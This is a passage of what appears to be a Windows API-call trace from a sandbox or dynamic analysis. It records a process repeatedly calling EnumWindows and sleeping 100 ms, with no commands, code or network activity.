(lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.160] Sleep (dwMilliseconds=0x64) [0258.254] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.254] Sleep (dwMilliseconds=0x64) [0258.304] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.304] Sleep (dwMilliseconds=0x64) [0258.321] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.321] Sleep (dwMilliseconds=0x64) [0258.373] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.373] Sleep (dwMilliseconds=0x64) [0258.488] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.488] Sleep (dwMilliseconds=0x64) [0258.574] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.574] Sleep (dwMilliseconds=0x64) [0258.696] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.699] Sleep (dwMilliseconds=0x64) [0258.797] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.797] Sleep (dwMilliseconds=0x64) [0258.873] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.874] Sleep (dwMilliseconds=0x64) [0258.922] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.923] Sleep (dwMilliseconds=0x64) [0258.987] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.988] Sleep (dwMilliseconds=0x64) [0259.056] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.056] Sleep (dwMilliseconds=0x64) [0259.124] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.124] Sleep (dwMilliseconds=0x64) [0259.215] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.215] Sleep (dwMilliseconds=0x64) [0259.268] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.268] Sleep (dwMilliseconds=0x64) [0259.308] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.308] Sleep (dwMilliseconds=0x64) [0259.342] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.343] Sleep (dwMilliseconds=0x64) [0259.379] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.379] Sleep (dwMilliseconds=0x64) [0259.388] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.388] Sleep (dwMilliseconds=0x64) [0259.436] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.437] Sleep (dwMilliseconds=0x64) [0259.513] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.514] Sleep (dwMilliseconds=0x64) [0259.625] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.625] Sleep (dwMilliseconds=0x64) [0259.715] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.720] Sleep (dwMilliseconds=0x64) [0259.828] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.829] Sleep (dwMilliseconds=0x64) [0259.932] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.936] Sleep (dwMilliseconds=0x64) [0259.999] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0259.999] Sleep (dwMilliseconds=0x64) [0260.014] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.014] Sleep (dwMilliseconds=0x64) [0260.031] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.032] Sleep (dwMilliseconds=0x64) [0260.074] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.078] Sleep (dwMilliseconds=0x64) [0260.154] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.154] Sleep (dwMilliseconds=0x64) [0260.249] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.250] Sleep (dwMilliseconds=0x64) [0260.359] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.360] Sleep (dwMilliseconds=0x64) [0260.429] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.429] Sleep (dwMilliseconds=0x64) [0260.483] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.483] Sleep (dwMilliseconds=0x64) [0260.518] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.519] Sleep (dwMilliseconds=0x64) [0260.594] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.595] Sleep (dwMilliseconds=0x64) [0260.636] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.636] Sleep (dwMilliseconds=0x64) [0260.783] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.784] Sleep (dwMilliseconds=0x64) [0260.890] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.890] Sleep (dwMilliseconds=0x64) [0260.983] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0260.983] Sleep (dwMilliseconds=0x64) [0261.074] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.078] Sleep (dwMilliseconds=0x64) [0261.166] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.166] Sleep (dwMilliseconds=0x64) [0261.208] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.209] Sleep (dwMilliseconds=0x64) [0261.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.215] Sleep (dwMilliseconds=0x64) [0261.263] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.264] Sleep (dwMilliseconds=0x64) [0261.309] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.310] Sleep (dwMilliseconds=0x64) [0261.355] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.356] Sleep (dwMilliseconds=0x64) [0261.464] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.464] Sleep (dwMilliseconds=0x64) [0261.617] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.621] Sleep (dwMilliseconds=0x64) [0261.764] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.764] Sleep (dwMilliseconds=0x64) [0261.890] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.891] Sleep (dwMilliseconds=0x64) [0261.952] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0261.952] Sleep (dwMilliseconds=0x64) [0262.032] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.033] Sleep (dwMilliseconds=0x64) [0262.089] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.090] Sleep (dwMilliseconds=0x64) [0262.264] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.275] Sleep (dwMilliseconds=0x64) [0262.406] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.407] Sleep (dwMilliseconds=0x64) [0262.482] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.482] Sleep (dwMilliseconds=0x64) [0262.568] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.569] Sleep (dwMilliseconds=0x64) [0262.732] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0262.733] Sleep (dwMilliseconds=0x64) [0262.923] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) returned 1 [0262.950] Sleep (dwMilliseconds=0x64) [0263.199] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0263.217] Sleep (dwMilliseconds=0x64) [0263.321] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0263.321] Sleep (dwMilliseconds=0x64) [0263.433] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0263.434] Sleep (dwMilliseconds=0x64) [0263.523] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0263.523] Sleep (dwMilliseconds=0x64) [0263.736] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0263.737] Sleep (dwMilliseconds=0x64) [0263.963] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0263.964] Sleep (dwMilliseconds=0x64) [0264.097] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.098] Sleep (dwMilliseconds=0x64) [0264.203] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.203] Sleep (dwMilliseconds=0x64) [0264.250] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.250] Sleep (dwMilliseconds=0x64) [0264.359] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.360] Sleep (dwMilliseconds=0x64) [0264.419] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.420] Sleep (dwMilliseconds=0x64) [0264.465] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.466] Sleep (dwMilliseconds=0x64) [0264.515] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.515] Sleep (dwMilliseconds=0x64) [0264.549] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.549] Sleep (dwMilliseconds=0x64) [0264.591] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.591] Sleep (dwMilliseconds=0x64) [0264.652] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.654] Sleep (dwMilliseconds=0x64) [0264.779] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.780] Sleep (dwMilliseconds=0x64) [0264.858] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.858] Sleep (dwMilliseconds=0x64) [0264.952] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0264.953] Sleep (dwMilliseconds=0x64) [0265.035] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.036] Sleep (dwMilliseconds=0x64) [0265.053] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.054] Sleep (dwMilliseconds=0x64) [0265.058] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.058] Sleep (dwMilliseconds=0x64) [0265.089] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.093] Sleep (dwMilliseconds=0x64) [0265.142] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.143] Sleep (dwMilliseconds=0x64) [0265.220] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.221] Sleep (dwMilliseconds=0x64) [0265.285] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.285] Sleep (dwMilliseconds=0x64) [0265.342] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.343] Sleep (dwMilliseconds=0x64) [0265.436] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.437] Sleep (dwMilliseconds=0x64) [0265.574] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.575] Sleep (dwMilliseconds=0x64) [0265.655] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.655] Sleep (dwMilliseconds=0x64) [0265.702] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.702] Sleep (dwMilliseconds=0x64) [0265.761] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.765] Sleep (dwMilliseconds=0x64) [0265.852] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.853] Sleep (dwMilliseconds=0x64) [0265.936] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0265.937] Sleep (dwMilliseconds=0x64) [0266.081] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.081] Sleep (dwMilliseconds=0x64) [0266.156] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.156] Sleep (dwMilliseconds=0x64) [0266.198] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.203] Sleep (dwMilliseconds=0x64) [0266.249] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.250] Sleep (dwMilliseconds=0x64) [0266.294] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.295] Sleep (dwMilliseconds=0x64) [0266.318] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.319] Sleep (dwMilliseconds=0x64) [0266.323] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.323] Sleep (dwMilliseconds=0x64) [0266.347] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.347] Sleep (dwMilliseconds=0x64) [0266.418] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.418] Sleep (dwMilliseconds=0x64) [0266.481] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.482] Sleep (dwMilliseconds=0x64) [0266.542] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.543] Sleep (dwMilliseconds=0x64) [0266.637] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.637] Sleep (dwMilliseconds=0x64) [0266.745] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.748] Sleep (dwMilliseconds=0x64) [0266.792] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.792] Sleep (dwMilliseconds=0x64) [0266.855] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.858] Sleep (dwMilliseconds=0x64) [0266.941] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.941] Sleep (dwMilliseconds=0x64) [0266.982] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0266.983] Sleep (dwMilliseconds=0x64) [0267.045] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.046] Sleep (dwMilliseconds=0x64) [0267.140] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.141] Sleep (dwMilliseconds=0x64) [0267.275] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.276] Sleep (dwMilliseconds=0x64) [0267.350] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.351] Sleep (dwMilliseconds=0x64) [0267.404] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.404] Sleep (dwMilliseconds=0x64) [0267.464] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.465] Sleep (dwMilliseconds=0x64) [0267.574] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.574] Sleep (dwMilliseconds=0x64) [0267.652] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.653] Sleep (dwMilliseconds=0x64) [0267.766] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.766] Sleep (dwMilliseconds=0x64) [0267.821] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.822] Sleep (dwMilliseconds=0x64) [0267.963] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0267.964] Sleep (dwMilliseconds=0x64) [0268.009] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.010] Sleep (dwMilliseconds=0x64) [0268.077] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.077] Sleep (dwMilliseconds=0x64) [0268.099] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.100] Sleep (dwMilliseconds=0x64) [0268.149] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.150] Sleep (dwMilliseconds=0x64) [0268.222] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.222] Sleep (dwMilliseconds=0x64) [0268.283] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.284] Sleep (dwMilliseconds=0x64) [0268.334] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.337] Sleep (dwMilliseconds=0x64) [0268.443] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.443] Sleep (dwMilliseconds=0x64) [0268.503] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.504] Sleep (dwMilliseconds=0x64) [0268.582] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.582] Sleep (dwMilliseconds=0x64) [0268.626] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.627] Sleep (dwMilliseconds=0x64) [0268.636] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.640] Sleep (dwMilliseconds=0x64) [0268.656] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.656] Sleep (dwMilliseconds=0x64) [0268.749] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.750] Sleep (dwMilliseconds=0x64) [0268.905] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0268.905] Sleep (dwMilliseconds=0x64) [0269.078] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.079] Sleep (dwMilliseconds=0x64) [0269.105] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.106] Sleep (dwMilliseconds=0x64) [0269.163] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.166] Sleep (dwMilliseconds=0x64) [0269.249] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.249] Sleep (dwMilliseconds=0x64) [0269.431] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.432] Sleep (dwMilliseconds=0x64) [0269.670] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.670] Sleep (dwMilliseconds=0x64) [0269.875] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0269.876] Sleep (dwMilliseconds=0x64) [0270.037] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.037] Sleep (dwMilliseconds=0x64) [0270.132] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.137] Sleep (dwMilliseconds=0x64) [0270.281] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.283] Sleep (dwMilliseconds=0x64) [0270.418] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.418] Sleep (dwMilliseconds=0x64) [0270.485] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.486] Sleep (dwMilliseconds=0x64) [0270.511] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.512] Sleep (dwMilliseconds=0x64) [0270.609] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.609] Sleep (dwMilliseconds=0x64) [0270.701] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.701] Sleep (dwMilliseconds=0x64) [0270.792] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.792] Sleep (dwMilliseconds=0x64) [0270.876] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.877] Sleep (dwMilliseconds=0x64) [0270.952] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0270.953] Sleep (dwMilliseconds=0x64) [0271.034] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.035] Sleep (dwMilliseconds=0x64) [0271.093] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.094] Sleep (dwMilliseconds=0x64) [0271.115] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.116] Sleep (dwMilliseconds=0x64) [0271.120] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.120] Sleep (dwMilliseconds=0x64) [0271.202] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.203] Sleep (dwMilliseconds=0x64) [0271.296] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.297] Sleep (dwMilliseconds=0x64) [0271.389] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.390] Sleep (dwMilliseconds=0x64) [0271.453] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.453] Sleep (dwMilliseconds=0x64) [0271.542] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.546] Sleep (dwMilliseconds=0x64) [0271.641] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.641] Sleep (dwMilliseconds=0x64) [0271.701] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.701] Sleep (dwMilliseconds=0x64) [0271.751] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.751] Sleep (dwMilliseconds=0x64) [0271.872] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.873] Sleep (dwMilliseconds=0x64) [0271.983] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0271.983] Sleep (dwMilliseconds=0x64) [0272.077] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0272.078] Sleep (dwMilliseconds=0x64) [0272.170] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0272.171] Sleep (dwMilliseconds=0x64) [0272.515] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0272.515] Sleep (dwMilliseconds=0x64) [0272.730] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0272.730] Sleep (dwMilliseconds=0x64) [0272.888] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0272.889] Sleep (dwMilliseconds=0x64) [0273.029] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.030] Sleep (dwMilliseconds=0x64) [0273.171] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.172] Sleep (dwMilliseconds=0x64) [0273.262] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.262] Sleep (dwMilliseconds=0x64) [0273.341] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.341] Sleep (dwMilliseconds=0x64) [0273.390] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.390] Sleep (dwMilliseconds=0x64) [0273.423] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.423] Sleep (dwMilliseconds=0x64) [0273.439] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.439] Sleep (dwMilliseconds=0x64) [0273.448] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.449] Sleep (dwMilliseconds=0x64) [0273.546] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.547] Sleep (dwMilliseconds=0x64) [0273.627] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.628] Sleep (dwMilliseconds=0x64) [0273.698] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.699] Sleep (dwMilliseconds=0x64) [0273.794] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.795] Sleep (dwMilliseconds=0x64) [0273.975] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0273.975] Sleep (dwMilliseconds=0x64) [0274.026] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.030] Sleep (dwMilliseconds=0x64) [0274.123] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.124] Sleep (dwMilliseconds=0x64) [0274.185] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.186] Sleep (dwMilliseconds=0x64) [0274.281] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.282] Sleep (dwMilliseconds=0x64) [0274.370] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.374] Sleep (dwMilliseconds=0x64) [0274.431] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.432] Sleep (dwMilliseconds=0x64) [0274.529] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.530] Sleep (dwMilliseconds=0x64) [0274.589] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.589] Sleep (dwMilliseconds=0x64) [0274.610] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.610] Sleep (dwMilliseconds=0x64) [0274.667] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.667] Sleep (dwMilliseconds=0x64) [0274.744] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.744] Sleep (dwMilliseconds=0x64) [0274.811] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.811] Sleep (dwMilliseconds=0x64) [0274.920] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0274.920] Sleep (dwMilliseconds=0x64) [0275.053] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.056] Sleep (dwMilliseconds=0x64) [0275.112] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.113] Sleep (dwMilliseconds=0x64) [0275.160] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.160] Sleep (dwMilliseconds=0x64) [0275.167] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.167] Sleep (dwMilliseconds=0x64) [0275.264] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.265] Sleep (dwMilliseconds=0x64) [0275.388] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.389] Sleep (dwMilliseconds=0x64) [0275.483] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.484] Sleep (dwMilliseconds=0x64) [0275.560] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.560] Sleep (dwMilliseconds=0x64) [0275.642] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.643] Sleep (dwMilliseconds=0x64) [0275.696] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.700] Sleep (dwMilliseconds=0x64) [0275.728] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.728] Sleep (dwMilliseconds=0x64) [0275.748] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.748] Sleep (dwMilliseconds=0x64) [0275.794] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.795] Sleep (dwMilliseconds=0x64) [0275.823] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.823] Sleep (dwMilliseconds=0x64) [0275.886] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.889] Sleep (dwMilliseconds=0x64) [0275.982] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0275.983] Sleep (dwMilliseconds=0x64) [0276.045] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.046] Sleep (dwMilliseconds=0x64) [0276.093] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.093] Sleep (dwMilliseconds=0x64) [0276.216] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.217] Sleep (dwMilliseconds=0x64) [0276.265] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.266] Sleep (dwMilliseconds=0x64) [0276.316] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.317] Sleep (dwMilliseconds=0x64) [0276.360] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.361] Sleep (dwMilliseconds=0x64) [0276.376] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.377] Sleep (dwMilliseconds=0x64) [0276.420] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.420] Sleep (dwMilliseconds=0x64) [0276.505] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.506] Sleep (dwMilliseconds=0x64) [0276.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0276.561] Sleep (dwMilliseconds=0x64) [0276.605] EnumWindows 